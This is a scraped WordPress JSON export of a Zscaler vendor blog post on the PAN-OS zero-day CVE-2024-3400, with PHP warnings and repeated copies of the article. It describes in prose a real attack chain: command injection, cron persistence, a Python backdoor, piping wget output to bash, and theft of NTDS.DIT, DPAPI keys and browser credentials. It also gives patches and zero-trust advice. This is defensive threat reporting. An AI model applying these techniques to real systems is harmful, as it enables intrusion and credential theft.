Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the easy-accordion-free domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the zoho-flow domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wordpress-seo domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php on line 6114

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893

Warning: Cannot modify header information - headers already sent by (output started at /home/mother99/jacksonholdingcompany.com/wp-includes/functions.php:6114) in /home/mother99/jacksonholdingcompany.com/wp-includes/rest-api/class-wp-rest-server.php on line 1893
{"id":2969,"date":"2024-04-16T09:51:13","date_gmt":"2024-04-16T09:51:13","guid":{"rendered":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/"},"modified":"2024-04-16T09:51:13","modified_gmt":"2024-04-16T09:51:13","slug":"another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust","status":"publish","type":"post","link":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/","title":{"rendered":"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust"},"content":{"rendered":"

A Year of Critical Zero Days: Firewalls, VPNs, and more <\/p>\n

This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets \u2014 a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network \u2014 specifically VPNs and Firewalls. <\/p>\n

Today, CVE-2024-3400 was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network\u2019s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild. <\/p>\n

No individual vendor can be immune from vulnerabilities. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises\u2019 assets, applications, servers, devices, and more invisible to attackers \u2014 hiding them behind a cloud-proxy architecture \u2014 while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack. <\/p>\n

Attack Chain <\/p>\n

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. <\/p>\n

Attack ScenarioThe following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers. <\/p>\n

Initial Exploitation: the attackers scan for and exploit the command injection vulnerability.
\nPersistence: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).
\nExecution: Download and Execute commands from remote location by piping wget output to bash.
\nLateral Movement: in at least \u200cone case, attackers pivoted internally across the affected networks via SMB and WinRM.
\nCollection: the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users\u2019 DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data.
\nExfiltration: The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker.<\/p>\n

Vendor RecommendationsUpdate 04\/15\/24: In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days. <\/p>\n

In response to this risk, Palo Alto Networks advises customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices. <\/p>\n

Affected VersionsVersion<\/p>\n

Affected Versions<\/p>\n

PAN-OS 11.1<\/p>\n

< 11.1.2-h3<\/p>\n

PAN-OS 11.0<\/p>\n

< 11.0.4-h1<\/p>\n

PAN-OS 10.2<\/p>\n

< 10.2.9-h1<\/p>\n

The problem is legacy technologyThe GlobalProtect vulnerability is the latest in a long line of VPN and Firewall-related security flaws. It\u2019s April, and we have already seen critical CVEs for Ivanti, Sonicwall, FortiNet, and Cisco VPN solutions. This shows that the problem is not the vendor, but the vulnerable technology-driven legacy architecture that makes it a prime target for threat actors. VPNs were first used in 1996, a time when many of today\u2019s complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies.<\/p>\n

These assets expose organizations to enormous risk due to the fact that:<\/p>\n

They are externally exposed \u2014 \u2018if it’s reachable, it’s breachable\u2019
\nTheir flawed architecture provides a beachhead into the corporate environments leading to lateral propagation, data exfiltration, compromising the entire environment.<\/p>\n

The fundamental problem with VPNs and firewalls is they create a public-facing point of contact to the outside world. They present sophisticated threat actors an opportunity to attack your organization until they discover a way in \u2014 think zero-day vulnerabilities. They bring both your users as well as threat actors (in the event of a successful exploit) onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls. <\/p>\n

Recent zero-day vulnerabilities in exposed VPNs and firewalls <\/p>\n

One recent case of legacy architecture leading to zero-day exploits are the Ivanti vulnerabilities disclosed in December 2023. Multiple zero-day vulnerabilities in Ivanti\u2019s VPN products were exploited by Chinese state-backed hackers taking advantage of flaws described in CVE-2023-46805 and CVE-2023-21887. The adversaries used these vulnerabilities to perform authentication bypass and remote command injection. Once these flaws were patched, attackers bypassed the fixes by leveraging other vulnerabilities (CVE-2024-21888). The workarounds used to circumvent the initial patch allowed attackers to enable privilege escalation and perform server-side request forgery. <\/p>\n

In February 2024, CISA released another VPN-related alert about an attack on Cisco\u2019s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). In this case, the Akira ransomware group exploited a vulnerability (CVE-2020-3259) to steal information by leveraging misconfigured instances of WebVPN\/AnyConnect. These repeated zero day attacks on VPN show that the real issue is the outdated architecture, not the specific vendors involved.<\/p>\n

How zero-day threats enable the four-stage attack sequence <\/p>\n

Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and VPNs, which are among the primary vectors used to breach organizations and steal their data. Moreover, it is not only these initial assets that expose enterprises to enormous risk \u2014 it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises\u2019 most critical applications and data stores, and steal their data. <\/p>\n

Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls.
\nInitial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprises devices and the network.
\nMove laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing other credentials, and compromising additional systems.
\nSteal data. Once threat actors have compromised your critical assets and data, they will work to exfiltrate it from the network. In the case of ransomware, attackers may additionally deploy ransomware, often leveraging a domain controller, to bring down the victim\u2019s environment.
\nFigure 3. The four-stage attack sequence. <\/p>\n

How can enterprises reduce the impact of zero-day attacks? <\/p>\n

While it will always be essential for enterprises to patch critical vulnerabilities, the only meaningful way to stay ahead of these types of zero-day attacks is for organizations to adopt a zero trust architecture. Avoid them altogether, from a first principles perspective. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more. <\/p>\n

Eliminate Your Attack Surface: Implement Zero Trust. While the term \u2018zero trust\u2019 is heavily used (and abused), it\u2019s for good reason: zero trust principles, and their accompanying architecture, represent the only way enterprises can overcome the risks associated with legacy networks, including vulnerabilities in firewalls and VPNs. These principles are not merely buzzwords applied to legacy products (virtualized VPNs and Firewalls are not zero trust) \u2014 they are goals that require technological transformation and a cloud-first approach to accomplish. <\/p>\n

Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt. <\/p>\n

Never trust, always verify. Enterprises should treat every user, device, application, workload, or data flow as untrusted. Moreover, enterprises should never connect users to the underlying network, but directly to applications using a cloud-proxy architecture.
\nAssume a breach has happened. Particularly given the recent pace of zero day vulnerability disclosures, enterprises should operate with an assumption that threat actors have already gained persistence in their environment and defend their crown jewel applications \u2014 where their most critical data is stored \u2014 accordingly.
\nVerify Explicitly with least privilege access. Enterprises should allow trust only after seven layers of zero trust security, identity, and contextual attributes have been established. <\/p>\n

Figure 4. Seven layers of security enabled with a Zero Trust architecture (in this case the Zscaler Zero Trust Exchange). <\/p>\n

In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more. <\/p>\n

A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange:<\/p>\n

Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
\nStops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real-time.
\nEliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network.
\nBlocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use.<\/p>\n

Best practices for enterprisesIn light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits:<\/p>\n

Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can\u2019t gain initial access.
\nPrevent initial compromise: inspect all traffic in-line to automatically stop zero-day exploits, malware, or other sophisticated threats.
\nEnforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources.
\nBlock unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests.
\nEliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident.
\nShutdown compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
\nStop data loss: inspect data in motion and data at rest to stop active data theft during an attack.
\nDeploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time.
\nTest your security posture: get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team.<\/p>\n

ConclusionToday\u2019s zero-day vulnerability impacting Palo Alto Network\u2019s GlobalProtect Gateway product represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, security weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads \u2014 the vulnerabilities in VPNs, firewalls, and the like \u2014 is key for creating a more robust and secure environment. <\/p>\n

Referenceshttps:\/\/www.volexity.com\/blog\/2024\/04\/12\/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400\/<\/p>\n

https:\/\/unit42.paloaltonetworks.com\/cve-2024-3400\/<\/p>\n

If you are concerned about these vulnerabilities, please contact Zscaler at ReplaceFWVPN@zscaler.com for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to Zero Trust. <\/p>\n

Acknowledgement for analysis: Atinderpal Singh, Will Seaton\u00a0\u00a0<\/p>\n

\u200b<\/p>\n

This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets \u2014 a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network \u2014 specifically VPNs and Firewalls.\u00a0<\/p>\n

\u00a0<\/p>\n

Today,\u00a0CVE-2024-3400<\/a> was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network\u2019s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild.\u00a0<\/p>\n

\u00a0<\/p>\n

No individual vendor can be immune from vulnerabilities<\/em>. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises\u2019 assets, applications, servers, devices, and more invisible to attackers \u2014 hiding them behind a cloud-proxy architecture \u2014 while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack.\u00a0<\/p>\n

\u00a0<\/p>\n

Attack Chain<\/strong><\/h3>\n

\u00a0<\/p>\n\n

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability.\u00a0<\/p>\n

\u00a0<\/p>\n

Attack Scenario<\/strong><\/h3>\n

The following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers.\u00a0<\/p>\n

\u00a0<\/p>\n

Initial Exploitation<\/strong>: the attackers scan for and exploit the command injection vulnerability.Persistence<\/strong>: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).Execution:\u00a0<\/strong>Download and Execute commands from remote location by piping wget output to bash.Lateral Movement<\/strong>: in at least \u200cone case, attackers pivoted internally across the affected networks via SMB and WinRM.Collection:<\/strong> the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users\u2019 DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data.Exfiltration:\u00a0<\/strong>The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker.<\/p>\n

Vendor Recommendations<\/h3>\n

Update 04\/15\/24:<\/strong> In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days.\u00a0<\/p>\n

\u00a0<\/p>\n

In response to this risk,\u00a0Palo Alto Networks advises<\/a> customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices.\u00a0\u00a0<\/p>\n

Affected Versions<\/h3>\n

\u00a0[[{“value”:”A Year of Critical Zero Days: Firewalls, VPNs, and more <\/p>\n

This past year has been, in many ways, the year of zero-day vulnerabilities for externally exposed assets \u2014 a trend that has laid bare some of the fundamental weaknesses of legacy architectures. In the past twelve months, we have witnessed back-to-back disclosures of zero-day vulnerabilities for critical assets that provide core access to the network \u2014 specifically VPNs and Firewalls. <\/p>\n

Today, CVE-2024-3400 was added to this list. This is a critical command injection vulnerability impacting Palo Alto Network\u2019s PAN-OS software used in its GlobalProtect Gateway, which is a firewall service that facilitates VPN connectivity, among other things. The vulnerability has a CVSS score of 10.0, the maximum possible severity, because it is exploitable by an unauthenticated user. For particular PAN-OS versions and feature configurations, this flaw may allow attackers to execute arbitrary code with root privileges on the firewall. According to Palo Alto Networks, this vulnerability is being actively exploited in the wild. <\/p>\n

No individual vendor can be immune from vulnerabilities. However, what these zero-day attacks show is that legacy VPN & firewall-based architectures are vulnerable to a single point of failure, creating significant risk for organizations. One of the key differentiators of a true Zero Trust Architecture, meanwhile, is that it can dramatically reduce the attack surface of an organization. This is by making enterprises\u2019 assets, applications, servers, devices, and more invisible to attackers \u2014 hiding them behind a cloud-proxy architecture \u2014 while entirely eliminating the need for such VPN and firewall products that are such frequent targets for attack. <\/p>\n

Attack Chain <\/p>\n

Figure 1: The possible firewall-based attack chain enabled by the PAN-OS zero-day vulnerability. <\/p>\n

Attack ScenarioThe following attack scenario was compiled from several documented real-world execution cases against CVE-2024-3400 and represents one possible path for attackers. <\/p>\n

Initial Exploitation: the attackers scan for and exploit the command injection vulnerability.
\nPersistence: use Cron job to download additional tools, including UPSTYLE, a python-based backdoor, and reverse proxy tools such as GOST (GO Simple Tunnel).
\nExecution: Download and Execute commands from remote location by piping wget output to bash.
\nLateral Movement: in at least \u200cone case, attackers pivoted internally across the affected networks via SMB and WinRM.
\nCollection: the adversary attempted to obtain the domain backup DPAPI keys and targeted active directory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal saved cookies and login data, along with users\u2019 DPAPI keys. Next, the attacker copied configuration data from the firewall device. Additionally, Login data, cookies, and local state data for Chrome and Microsoft Edge were also compromised. This enabled the attacker to obtain the browser master key and decrypt sensitive data.
\nExfiltration: The stolen data files were saved to an externally accessible web directory for later retrieval by the attacker.<\/p>\n

Vendor RecommendationsUpdate 04\/15\/24: In response to this risk, Palo Alto Networks advises customers to apply hotfixes as soon as they are available. As of Apr 15, 2024, the following hotfixes are released: PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3. Customers are advised to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Hotfixes for other commonly deployed maintenance versions are expected in the next 1-4 days. <\/p>\n

In response to this risk, Palo Alto Networks advises customers to temporarily disable device telemetry as an alternative mitigation of this vulnerability until the device is upgraded to a fixed PAN-OS version. Moreover, customers should monitor the network for any suspicious activity and follow security best practices. <\/p>\n

Affected VersionsVersion<\/p>\n

Affected Versions<\/p>\n

PAN-OS 11.1<\/p>\n

< 11.1.2-h3<\/p>\n

PAN-OS 11.0<\/p>\n

< 11.0.4-h1<\/p>\n

PAN-OS 10.2<\/p>\n

< 10.2.9-h1<\/p>\n

The problem is legacy technologyThe GlobalProtect vulnerability is the latest in a long line of VPN and Firewall-related security flaws. It\u2019s April, and we have already seen critical CVEs for Ivanti, Sonicwall, FortiNet, and Cisco VPN solutions. This shows that the problem is not the vendor, but the vulnerable technology-driven legacy architecture that makes it a prime target for threat actors. VPNs were first used in 1996, a time when many of today\u2019s complex and sophisticated cyberattacks did not exist. Traditional firewalls have been around even longer. Nearly three decades later, threat actors are still regularly finding ways to exploit these technologies.<\/p>\n

These assets expose organizations to enormous risk due to the fact that:<\/p>\n

They are externally exposed \u2014 \u2018if it’s reachable, it’s breachable\u2019
\nTheir flawed architecture provides a beachhead into the corporate environments leading to lateral propagation, data exfiltration, compromising the entire environment.<\/p>\n

The fundamental problem with VPNs and firewalls is they create a public-facing point of contact to the outside world. They present sophisticated threat actors an opportunity to attack your organization until they discover a way in \u2014 think zero-day vulnerabilities. They bring both your users as well as threat actors (in the event of a successful exploit) onto your network. Given the potential reward from a successful exploit, we will continue to see threat actors targeting VPNs and firewalls. <\/p>\n

Recent zero-day vulnerabilities in exposed VPNs and firewalls <\/p>\n

One recent case of legacy architecture leading to zero-day exploits are the Ivanti vulnerabilities disclosed in December 2023. Multiple zero-day vulnerabilities in Ivanti\u2019s VPN products were exploited by Chinese state-backed hackers taking advantage of flaws described in CVE-2023-46805 and CVE-2023-21887. The adversaries used these vulnerabilities to perform authentication bypass and remote command injection. Once these flaws were patched, attackers bypassed the fixes by leveraging other vulnerabilities (CVE-2024-21888). The workarounds used to circumvent the initial patch allowed attackers to enable privilege escalation and perform server-side request forgery. <\/p>\n

In February 2024, CISA released another VPN-related alert about an attack on Cisco\u2019s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD). In this case, the Akira ransomware group exploited a vulnerability (CVE-2020-3259) to steal information by leveraging misconfigured instances of WebVPN\/AnyConnect. These repeated zero day attacks on VPN show that the real issue is the outdated architecture, not the specific vendors involved.<\/p>\n

How zero-day threats enable the four-stage attack sequence <\/p>\n

Enterprises should understand that attackers target vulnerabilities in their exposed, internet-connected assets. This includes firewalls and VPNs, which are among the primary vectors used to breach organizations and steal their data. Moreover, it is not only these initial assets that expose enterprises to enormous risk \u2014 it is also the underlying network architecture, which allows attackers, once they have compromised these initial assets, to move laterally, find enterprises\u2019 most critical applications and data stores, and steal their data. <\/p>\n

Reconnaissance. Attackers scan for critical vulnerabilities in the external enterprise attack surface, including zero-day vulnerabilities in VPNs and firewalls.
\nInitial compromise. Threat actors exploit these VPN and firewall vulnerabilities to gain initial access to enterprises devices and the network.
\nMove laterally. Attackers establish persistence and move laterally across the network, scanning for high-value assets, stealing other credentials, and compromising additional systems.
\nSteal data. Once threat actors have compromised your critical assets and data, they will work to exfiltrate it from the network. In the case of ransomware, attackers may additionally deploy ransomware, often leveraging a domain controller, to bring down the victim\u2019s environment.
\nFigure 3. The four-stage attack sequence. <\/p>\n

How can enterprises reduce the impact of zero-day attacks? <\/p>\n

While it will always be essential for enterprises to patch critical vulnerabilities, the only meaningful way to stay ahead of these types of zero-day attacks is for organizations to adopt a zero trust architecture. Avoid them altogether, from a first principles perspective. Here are some fundamental zero trust principles that organizations can adopt to mitigate the risks of exposed assets like VPNs, firewalls, and more. <\/p>\n

Eliminate Your Attack Surface: Implement Zero Trust. While the term \u2018zero trust\u2019 is heavily used (and abused), it\u2019s for good reason: zero trust principles, and their accompanying architecture, represent the only way enterprises can overcome the risks associated with legacy networks, including vulnerabilities in firewalls and VPNs. These principles are not merely buzzwords applied to legacy products (virtualized VPNs and Firewalls are not zero trust) \u2014 they are goals that require technological transformation and a cloud-first approach to accomplish. <\/p>\n

Per the NSA Zero Trust Security Model, there are three fundamental principles enterprises should adopt. <\/p>\n

Never trust, always verify. Enterprises should treat every user, device, application, workload, or data flow as untrusted. Moreover, enterprises should never connect users to the underlying network, but directly to applications using a cloud-proxy architecture.
\nAssume a breach has happened. Particularly given the recent pace of zero day vulnerability disclosures, enterprises should operate with an assumption that threat actors have already gained persistence in their environment and defend their crown jewel applications \u2014 where their most critical data is stored \u2014 accordingly.
\nVerify Explicitly with least privilege access. Enterprises should allow trust only after seven layers of zero trust security, identity, and contextual attributes have been established. <\/p>\n

Figure 4. Seven layers of security enabled with a Zero Trust architecture (in this case the Zscaler Zero Trust Exchange). <\/p>\n

In practice, a zero trust architecture is fundamentally different from those built on firewalls and VPNs. Compared to traditional, perimeter-based networking approaches, which place users on the enterprise network, a zero trust architecture enables one-to-one connectivity between requesters and resources. This could include, for instance, users connecting to applications, but it could also enable connectivity between workloads, branch locations, remote users and operational technology (OT) systems, and much more. <\/p>\n

A cloud native, proxy-based zero trust architecture like the Zscaler Zero Trust Exchange:<\/p>\n

Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
\nStops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real-time.
\nEliminates lateral threat movement by connecting entities to individual IT resources instead of extending access to the entire network.
\nBlocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use.<\/p>\n

Best practices for enterprisesIn light of these recent zero-day vulnerabilities, it is imperative that enterprises employ the following best practices to fortify their organization against potential exploits:<\/p>\n

Minimize the attack surface: make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can\u2019t gain initial access.
\nPrevent initial compromise: inspect all traffic in-line to automatically stop zero-day exploits, malware, or other sophisticated threats.
\nEnforce least-privileged access: restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources.
\nBlock unauthorized access: use strong multi-factor authentication (MFA) to validate user access requests.
\nEliminate lateral movement: connect users directly to apps, not the network, to limit the blast radius of a potential incident.
\nShutdown compromised users and insider threats: enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
\nStop data loss: inspect data in motion and data at rest to stop active data theft during an attack.
\nDeploy active defenses: leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real time.
\nTest your security posture: get regular third-party risk assessments and conduct purple team activities to identify and harden the gaps in your security program. Request that your service providers and technology partners do the same and share the results of these reports with your security team.<\/p>\n

ConclusionToday\u2019s zero-day vulnerability impacting Palo Alto Network\u2019s GlobalProtect Gateway product represents yet another unfortunate milestone in a clear enterprise trend: traditional, perimeter-based approaches to security and networking face systemic, not temporary, security weaknesses that cannot be waved away with any single security patch. Of course, no vendor can be immune from software defects and vulnerabilities. However, given the back-to-back CVEs impacting firewalls, VPNs, supply chain tools, and more, it should be clear to security leaders and practitioners that zero trust security is crucial. Adopting a cloud-delivered zero trust architecture removes the attack surface created by legacy technology. Denying attackers their traditional beachheads \u2014 the vulnerabilities in VPNs, firewalls, and the like \u2014 is key for creating a more robust and secure environment. <\/p>\n

Referenceshttps:\/\/www.volexity.com\/blog\/2024\/04\/12\/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400\/<\/p>\n

https:\/\/unit42.paloaltonetworks.com\/cve-2024-3400\/<\/p>\n

If you are concerned about these vulnerabilities, please contact Zscaler at ReplaceFWVPN@zscaler.com for a free external attack surface assessment as well as professional consultation on how you can migrate from legacy architectures to Zero Trust. <\/p>\n

Acknowledgement for analysis: Atinderpal Singh, Will Seaton”}]]\u00a0<\/p>","protected":false},"excerpt":{"rendered":"

A Year of Critical Zero Days: Firewalls, VPNs, and more […]<\/p>\n","protected":false},"author":0,"featured_media":2962,"comment_status":"","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11],"tags":[],"class_list":["post-2969","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-zenith-zscaler"],"yoast_head":"\nAnother CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust - JHC<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust\" \/>\n<meta property=\"og:description\" content=\"A Year of Critical Zero Days: Firewalls, VPNs, and more […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\" \/>\n<meta property=\"og:site_name\" content=\"JHC\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-16T09:51:13+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"467\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"23 minutes\" \/>\n<script type=\"application\/ld+json\" 